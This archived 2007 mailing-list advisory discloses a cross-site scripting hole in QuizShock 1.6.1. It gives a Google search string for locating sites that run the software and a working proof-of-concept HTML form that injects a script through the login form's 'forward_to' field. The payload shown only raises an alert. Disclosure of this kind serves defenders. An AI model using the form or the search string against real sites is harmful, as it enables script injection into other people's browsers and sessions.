OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
QuizShock 1.6.1 - Cross-Site Scripting Vulnerability

johnmartinelli.com
Date: Sat Apr 07 2007 - 23:35:26 CDT


<!--

QuizShock 1.6.1 - Cross-Site Scripting Vulnerability

Vulnerable: QuizShock 1.6.1 (tested 1.5.8, 1.5.9, 1.6.0, and 1.6.1)
Google d0rk: allintitle:"powered by QuizShock"

John Martinelli
johnmartinelli.com
http://john-martinelli.com

april 8th, 2007

!-->

<html>
<head><title>QuizShock 1.6.1 Cross-Site Scripting Vulnerability</title><body>

<center><br><br><font size=4>QuizShock 1.6.1 Cross-Site Scripting Vulnerability</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a></font><br>

<br><br>
<form action="http://target.com/auth.php" method="post">
<input type=hidden name=ts_username size=10 class="input">
<input name="forward_to" size=75 value="&lt;&quot;&lt;<script>alert(551660661);</script>">
<input type=hidden name="fn" value="login">
<input type=hidden name=ts_password type=password class="input">
<input type=hidden name="remember" value=0 class=input>
<input type=submit value="Execute XSS Attack" class="button">
</form>

</body></html>